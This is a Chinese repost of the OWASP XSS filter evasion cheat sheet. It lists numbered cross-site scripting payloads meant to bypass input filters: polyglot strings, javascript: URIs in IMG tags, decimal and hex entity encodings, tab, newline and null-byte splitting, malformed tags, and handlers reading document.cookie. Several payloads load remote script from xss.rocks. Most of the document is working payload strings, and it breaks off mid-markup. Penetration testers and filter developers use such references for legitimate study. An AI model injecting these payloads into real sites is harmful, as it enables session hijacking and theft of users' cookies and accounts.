清浅丶
清浅丶

XSS过滤速查表

初见于Freebuf,放在这里收藏一下。 就是OWASP的速查表 不过是中文的


1.介绍

这篇文章的主要目的是给专业安全测试人员提供一份跨站脚本漏洞检测指南。文章的初始内容是由RSnake提供给 OWASP,内容基于他的XSS备忘录:http://ha.ckers.org/xss.html。目前这个网页已经重定向到OWASP网站,将由OWASP维护和完善它。OWASP 的第一个防御备忘录项目:XSS (Cross Site Scripting)Prevention Cheat Sheet 灵感来源于 RSnake 的 XSS Cheat Sheet,所以我们对他给予我们的启发表示感谢。我们想要去创建短小简单的参考给开发者以便帮助他们预防 XSS漏洞,而不是简单的告诉他们需要使用复杂的方法构建应用来预防各种千奇百怪的攻击,这也是OWASP 备忘录系列诞生的原因。

2.测试

这份备忘录是为那些已经理解XSS攻击,但是想要了解关于绕过过滤器方法之间细微差别的人准备的。

请注意大部分的跨站脚本攻击向量已经在其代码下方给出的浏览器列表中进行测试。

2.1.  XSS定位器

在大多数存在漏洞且不需要特定XSS攻击代码的地方插入下列代码会弹出包含“XSS”字样的对话框。使用URL编码器来对整个代码进行编码。小技巧:如果你时间很紧想要快速检查页面,通常只要插入“<任意文本>”标签,然后观察页面输出是否明显改变了就可以判断是否存在漏洞:

‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”;

alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//–

>”>’>

2.2.  XSS定位器(短)

如果你没有足够的空间并且知道页面上没有存在漏洞的JavaScript,这个字符串是一个不错的简洁XSS注入检查。注入后查看页面源代码并且寻找是否存在<XSS字样来确认是否存在漏洞

”;!–”=&{()}

2.3.  无过滤绕过

这是一个常规的XSS注入代码,虽然通常它会被防御,但是建议首先去测试一下。(引号在任何现代浏览器中都不需要,所以这里省略了它):

2.4.  利用多语言进行过滤绕过

‘”>>”>

</p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> <script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’–>”></script></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> <script>alert(document.cookie)</script>”></p> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word"> <img/id=”confirm&lpar;1)”/alt=”/”src=”/”οnerrοr=eval(id)>’”></p> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <img src=”http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor.jpg“></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.5.  通过JavaScript命令实现的图片XSS</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 图片注入使用JavaScript命令实现(IE7.0 不支持在图片上下文中使用JavaScript 命令,但是可以在其他上下文触发。下面的例子展示了一种其他标签依旧通用的原理):</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IMG SRC=”javascript:alert(‘XSS’);”></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.6.  无分号无引号</h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IMG SRC=javascript:alert(‘XSS’)></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.7.  不区分大小写的XSS攻击向量</h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IMG SRC=JaVaScRiPt:alert(‘XSS’)></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.8.  HTML实体</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 必须有分号才可生效</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IMG SRC=javascript:alert(&quot;XSS&quot;)></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.9.  重音符混淆</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 如果你的JavaScript代码中需要同时使用单引号和双引号,那么可以使用重音符(`)来包含JavaScript 代码。这通常会有很大帮助,因为大部分跨站脚本过滤器都没有过滤这个字符:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IMG SRC=`javascript:alert(“RSnake says, ‘XSS’”)`></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.10.    畸形的A标签</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 跳过HREF标签找到XSS的重点。。。由DavidCross提交~已在Chrome上验证</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <a οnmοuseοver=”alert(document.cookie)”>xxs link</a></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 此外Chrome经常帮你补全确实的引号。。。如果在这方面遇到问题就直接省略引号,Chrome会帮你补全在URL或脚本中缺少的引号。</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <a οnmοuseοver=alert(document.cookie)>xxs link</a></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.11.    畸形的IMG标签</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 最初由Begeek发现(短小精湛适用于所有浏览器),这个XSS攻击向量使用了不严格的渲染引擎来构造含有IMG标签并被引号包含的XSS攻击向量。我猜测这种解析原来是为了兼容不规范的编码。这会让它更加难以正确的解析HTML标签:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.12.    fromCharCode函数</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 如果不允许任何形式的引号,你可以通过执行JavaScript里的fromCharCode函数来创建任何你需要的XSS攻击向量:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.13.    使用默认SRC属性绕过SRC域名过滤器</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 这种方法可以绕过大多数SRC域名过滤器。将JavaScript代码插入事件方法同样适用于注入使用elements的任何HTML标签,例如Form,Iframe, Input, Embed等等。它同样允许将事件替换为任何标签中可用的事件类型,例如onblur,onclick。下面会给出许多不同的可注入事件列表。由David Cross提交,Abdullah Hussam(@Abdulahhusam)编辑。</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IMG SRC=# οnmοuseοver=”alert(‘xxs’)”></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.14.    使用默认为空的SRC属性</h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IMG SRC= οnmοuseοver=”alert(‘xxs’)”></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.15.    使用不含SRC属性</h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IMG οnmοuseοver=”alert(‘xxs’)”></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.16.    通过error事件触发alert</h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IMG SRC=/ οnerrοr=”alert(String.fromCharCode(88,83,83))”></img></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.17.    对IMG标签中onerror属性进行编码</h3> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <img src=x οnerrοr=”&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041″></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.18.    十进制HTML字符实体编码</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 所有在IMG标签里直接使用javascript:形式的XSS示例无法在Firefox或Netscape8.1以上浏览器(使用Gecko渲染引擎)运行。</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;</p> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> &#39;&#88;&#83;&#83;&#39;&#41;></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.19.    不带分号的十进制HTML字符实体编码</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 这对于绕过对“&#XX;”形式的XSS过滤非常有用,因为大多数人不知道最长可使用7位数字。这同样对例如$tmp_string =~s/.*\&#(\d+);.*/$1/;形式的过滤器有效,这种过滤器是错误的认为HTML字符实体编码需要用分号结尾(无意中发现的):</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:10px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&</p> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word; text-align:justify"> #0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.20.    不带分号的十六进制HTML字符实体编码</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 这是有效绕过例如$tmp_string =~ s/.*\&#(\d+);.*/$1/;过滤器的方法。这种过滤器错误的认为#号后会跟着数字(十六进制HTML字符实体编码并非如此)</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.21.    内嵌TAB</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 使用TAB来分开XSS攻击代码:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IMG SRC=”jav ascript:alert(‘XSS’);”></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.22.    内嵌编码后TAB</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 使用编码后的TAB来分开XSS攻击代码:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IMG SRC=”jav&#x09;ascript:alert(‘XSS’);”></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.23.    内嵌换行分隔XSS攻击代码</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 一些网站声称09到13(十进制)的HTML实体字符都可以实现这种攻击,这是不正确的。只有09(TAB),10(换行)和13(回车)有效。查看ASCII字符表获取更多细节。下面几个XSS示例介绍了这些向量。</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IMG SRC=”jav&#x0A;ascript:alert(‘XSS’);”></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.24.    内嵌回车分隔XSS攻击代码</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 注意:上面使用了比实际需要长的字符串是因为0可以忽略。经常可以遇到过滤器解码十六进制和十进制编码时认为只有2到3位字符。实际规则是1至7位字符:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IMG SRC=”jav&#x0D;ascript:alert(‘XSS’);”></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.25.    使用空字符分隔JavaScript指令</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 空字符同样可以作为XSS攻击向量,但和上面有所区别,你需要使用一些例如Burp工具或在URL字符串里使用%00,亦或你想使用VIM编写自己的注入工具(^V^@会生成空字符),还可以通过程序生成它到一个文本文件。老版本的Opera浏览器(例如Windows版的7.11)还会受另一个字符173(软连字符)的影响。但是空字符%00更加有用并且能帮助绕过真实世界里的过滤器,例如这个例子里的变形:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out</p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.26.    利用IMG标签中JavaScript指令前的空格和元字符</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 如果过滤器不计算”javascript:”前的空格,这是正确的,因为它们不会被解析,但这点非常有用。因为这会造成错误的假设,就是引号和”javascript:”字样间不能有任何字符。实际情况是你可以插入任何十进制的1至32号字符:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <IMG SRC=” &#14;  javascript:alert(‘XSS’);”></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.27.    利用非字母非数字字符</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> FireFox的HTML解析器认为HTML关键词后不能有非字母非数字字符,并且认为这是一个空白或在HTML标签后的无效符号。但问题是有的XSS过滤器认为它们要查找的标记会被空白字符分隔。例如”<SCRIPT\s” != “<SCRIPT/XSS\s”:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <SCRIPT/XSS SRC=”http://xss.rocks/xss.js“></SCRIPT></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 基于上面的原理,可以使用模糊测试进行扩展。Gecko渲染引擎允许任何字符包括字母,数字或特殊字符(例如引号,尖括号等)存在于事件名称和等号之间,这会使得更加容易绕过跨站脚本过滤。注意这同样适用于下面看到的重音符:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> Yair Amit让我注意到了IE和Gecko渲染引擎有一点不同行为,在于是否在HTML标签和参数之间允许一个不含空格的斜杠。这会非常有用如果系统不允许空格的时候。</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <SCRIPT/SRC=”http://xss.rocks/xss.js“></SCRIPT></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.28.    额外的尖括号</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 由Franz Sedlmaier提交,这个XSS攻击向量可以绕过某些检测引擎,比如先查找第一个匹配的尖括号,然后比较里面的标签内容,而不是使用更有效的算法,例如Boyer-Moore算法就是查找整个字符串中的尖括号和相应标签(当然是通过模糊匹配)。双斜杠注释了额外的尖括号来防止出现JavaScript错误:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <<SCRIPT>alert(“XSS”);//<</SCRIPT></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.29.    未闭合的script标签</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 在Firefox和Netscape 8.1的Gecko渲染引擎下你不是必须构造类似“></SCRIPT>”的跨站脚本攻击向量。Firefox假定闭合HTML标签是安全的并且会为你添加闭合标记。多么体贴!不像不影响Firefox的下一个问题,这不需要在后面有额外的HTML标签。如果需要可以添加引号,但通常是没有必要的,需要注意的是,我并不知道这样注入后HTML会什么样子结束:</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <SCRIPT SRC=http://xss.rocks/xss.js?< B ></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 style="font-family:微软雅黑; line-height:1.1; color:rgb(0,112,192); margin:20px 0px 15px; font-size:16px"> 2.30.    script标签中的协议解析</h3> <p style="margin-top:0px; margin-bottom:10px; font-size:15px; line-height:26px; word-wrap:break-word; word-break:break-word; color:rgb(88,88,88); font-family:微软雅黑"> 这个特定的变体是由Łukasz Pilorz提交的并且基于Ozh提供的协议解析绕过。这个跨站脚本示例在IE和Netscape的IE渲染模式下有效,如果添加了</SCRIPT>标记在Opera中也可以。这在输入空间有限的情况下是非常有用的,你所使用的域名越短越好。”.j”是可用的,在SCRIPT标签中不需要考虑编码类型因为浏览器会自动识别。</p> <blockquote style="padding:10px 20px; margin:0px 0px 20px; font-size:15px; border-left:5px solid rgb(238,238,238); background:rgb(247,247,247); color:rgb(88,88,88); font-family:微软雅黑"> <p style="margin-top:0px; margin-bottom:0px; line-height:26px; word-wrap:break-word; word-break:break-word"> <SCRIPT SRC=//xss.rocks/.j></p> </blockquote> <div class="simditor-table" style="color:rgb(88,88,88); font-family:微软雅黑; font-size:15px"> <div class="simditor-resize-handle" style=""></div> </div> <h3 